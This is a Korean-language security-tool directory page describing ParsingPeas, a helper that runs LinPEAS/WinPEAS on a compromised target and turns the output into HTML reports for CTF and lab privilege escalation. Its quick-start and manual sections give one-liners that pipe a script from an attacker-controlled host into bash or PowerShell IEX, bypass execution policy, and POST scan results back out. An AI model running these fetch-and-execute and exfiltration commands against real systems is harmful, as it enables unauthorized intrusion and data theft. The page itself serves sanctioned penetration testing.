Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ParsingPeas — PEAS 출력을 위한 추가 기능이 포함된 HTML 파서 | Kitploit
도구/GitHubGitHub/yuvalmil/parsingpeas
Privilege EscalationScripting & AutomationInformation GatheringPost-ExploitationCTFPenetration TestingUtilities & FrameworksLearning & EducationLabs & Practice
GitHubyuvalmil/parsingpeas

ParsingPeas

PEAS 출력을 위한 추가 기능이 포함된 HTML 파서

159141개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

ParsingPeas 🥒

PEASS 자동 수집 + CTF 및 실습 환경 권한 상승 작업을 위한 깔끔하고 이식 가능한 HTML 보고서

License: MIT Python 3.8+

타겟에서 한 명령을 실행합니다. ParsingPeas가 Kali 호스트에서 LinPEAS/WinPEAS를 가져와 스캔을 실행하고, 출력을 다시 보내며, 읽고, 검색하고, 분류하고, 보관할 수 있는 단일 자체 포함 HTML 보고서로 변환합니다. 수동 파일 전송이나 타겟의 인터넷 연결이 필요 없습니다.


스크린샷

보고서 요약 — LinPEAS 자체 카테고리별로 그룹화된 섹션, 발견 표시점 및 발견 막대:

보고서 요약

발견 항목만 — 한 번의 클릭으로 보고서와 사이드바를 심각/높음 히트가 있는 섹션으로 필터링:

발견 항목만

전체 터미널 출력 — 완전하고 충실하게 색상이 지정된 스캔; Ctrl-F로 검색 가능:

전체 터미널 출력


이유

원시 PEASS 출력은 셸이 종료되자마자 사라지는 스크롤되는 터미널 텍스트 벽입니다. ParsingPeas:

  • 번거로운 작업을 자동화 — scp, linpeas 자체 호스팅, 출력을 Kali에 복사하여 붙여넣기할 필요가 없습니다.
  • 저장 — 모든 스캔은 호스트에 타임스탬프가 찍힌 HTML 보고서가 됩니다.
  • 탐색 가능하게 만듦 — 출력은 LinPEAS의 실제 섹션으로 분할되어 범주화된 사이드바, 발견 항목 강조 표시, 전체 텍스트 검색이 포함됩니다.
  • 이식성이 좋음 — 각 보고서는 단일 자체 포함 .html 파일로, 상자에서 복사하거나, 보관하거나, 더블 클릭하여 오프라인으로 열 수 있습니다.

이는 프레젠테이션 + 물류이며, 익스플로잇 엔진이 아닙니다. PEASS 자체 색상과 발견 항목을 충실히 보존하며 재해석하지 않습니다.


기능

  • 원라인 워크플로 — 타겟이 호스트에서 래퍼를 다운로드하고, PEASS를 실행하며, 결과를 자동으로 POST로 다시 보냅니다.
  • 타겟에서 오프라인 작동 — 모든 것이 Kali 호스트에서 제공됩니다.
  • 충실한 섹션 구문 분석 — LinPEAS의 실제 2단계 헤더 계층 구조(주요 섹션 + 하위 검사)를 따릅니다. hacktricks 링크와 검사 라인은 내용으로 남아 목차를 오염시키지 않습니다.
  • 자체 포함 보고서 — 터미널 출력이 인라인으로 포함됩니다. 하나의 파일, 부속 파일 없음, file://을 통해 열립니다.
  • 대화형 보고서 보기:
    • PEASS 자체 섹션별로 그룹화된 사이드바 TOC, 심각/높음 개수 표시.
    • 발견 막대 — N 심각 / N 높음 칩이 플래그가 지정된 섹션 사이를 이동하며, 색상 범례 제공.
    • 발견 항목만 필터로 빠른 분류.
    • 줄 바꿈 토글 (기본값 켜짐 — 더 이상 잘린 줄 없음).
    • 스크롤스파이 — 스크롤하는 동안 현재 섹션이 TOC에서 강조 표시됨.
    • 고정 섹션 헤더 및 "읽은 상태" 표시점이 유지됨 (localStorage, 보고서별).
    • 헤더 배지 — 현재 사용자 (루트이면 빨간색) 및 OS.
  • 전체 터미널 출력 탭 — 완전하고 색상이 지정된 스캔, 한 번에 렌더링되어 브라우저의 Ctrl-F가 모두 검색 가능.
  • 음영 처리된 어두운 테마 — 긴 세션 동안 눈에 편안함.
  • Linux 및 Windows — LinPEAS (bash) 및 WinPEAS (PowerShell).

빠른 시작

Kali 호스트에서

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # scripts/에 LinPEAS + WinPEAS 다운로드
pip3 install -r requirements.txt
python3 receiver.py             # http://0.0.0.0:8005에서 서비스

receiver.py를 계속 실행합니다. 타겟이 당신에게 연결할 수 있는 IP를 찾으십시오:

  • HTB / VPN: tun0 주소 — ip -4 addr show tun0
  • LAN: 일반 인터페이스 IP

타겟에서

Linux/Unix (curl 사용, wget으로 대체 가능):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

Windows (PowerShell / 리버스 셸):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

타겟 OS와 일치하는 원라이너를 선택하십시오 — Linux는 LinPEAS, Windows는 WinPEAS를 제공합니다.

보고서 보기

보고서는 Kali 호스트의 ./reports/에 생성됩니다. 다음 중 하나를 수행하십시오:

  • **http://YOUR_KALI_IP:8005**에서 인덱스를 탐색하고 보고서를 클릭하거나, 또는
  • 생성된 파일을 직접 엽니다 — 자체 포함되어 있습니다:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

해당 단일 .html 파일을 원하는 곳에 복사하십시오. 단독으로 작동합니다.


작동 방식

root@kitploit:~
타겟 → Kali에서 래퍼 다운로드 → PEASS 실행 → 출력 POST → Kali가 구문 분석 → 자체 포함 HTML 보고서

타겟은 인터넷이 필요하지 않습니다 — 래퍼와 PEASS 바이너리는 모두 호스트에서 제공됩니다.


보고서 사용

  • 보고서 요약 탭 — 사이드바에서 PEASS 카테고리별로 그룹화된 섹션. 빨간색/노란색 점은 심각/높음 발견 항목이 있는 섹션을 표시합니다. 발견 항목 칩을 사용하여 해당 섹션으로 바로 이동하거나 발견 항목만을 사용하여 다른 모든 것을 숨길 수 있습니다.
  • 전체 터미널 출력 탭 — 완전히 색상이 지정된 스캔. Ctrl-F를 누르기만 하면 검색할 수 있습니다. 전체 출력이 렌더링되므로 기본 찾기가 모두 포함됩니다.
  • 발견 점을 클릭하여 섹션을 읽은 상태로 표시 — 보고서를 다시 열어도 읽은 상태로 유지됩니다.

수동 사용

원라이너가 실패할 경우 수동으로 수행하십시오.

Linux:

root@kitploit:~
# 타겟에서
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# 다시 보내기
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

Windows (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

이미 가지고 있는 PEASS 덤프를 구문 분석:

root@kitploit:~
python3 parser.py /path/to/peas_output.txt   # ./reports/에 HTML 보고서 작성

설정

receiver.py 상단을 편집하십시오:


문제 해결

  • 스크립트를 다운로드할 수 없습니까? curl http://KALI_IP:8005/health로 연결 확인; sudo ufw allow 8005/tcp로 방화벽 열기.
  • /get-linpeas에서 404? ./setup.sh를 실행하여 PEASS 바이너리를 가져오십시오.
  • PowerShell 리버스 셸에서 실시간 출력이 없습니까? 예상된 동작입니다 — 스캔은 여전히 실행됩니다. 업로드 확인을 위해 수신기를 확인하십시오.

보안

⚠️ 허가된 침투 테스트, CTF 및 실습 환경 전용입니다.

  • 인증이 없습니다 — 격리된/CTF 네트워크, 방화벽 뒤에서만 실행하십시오.
  • 업로드 헤더 값은 살균되고 업로드 크기는 제한되지만, 서버는 적대적인 인터넷 노출에 대해 강화되지 않았습니다.

크레딧

PEASS-ng 기반, @carlospolop 제공. ParsingPeas는 출력을 수집하고 표시만 합니다.


MIT 라이선스 · 기여 환영

도구 다운로드
설정기본값설명
포트8005app.run(... port=...) 줄 변경
OUTPUT_DIR./received_outputs원시 업로드된 스캔
REPORTS_DIR./reports생성된 HTML 보고서
SCRIPTS_DIR./scriptsLinPEAS/WinPEAS 바이너리
MAX_UPLOAD_SIZE10 MB강제 적용 — 더 큰 업로드는 HTTP 413 반환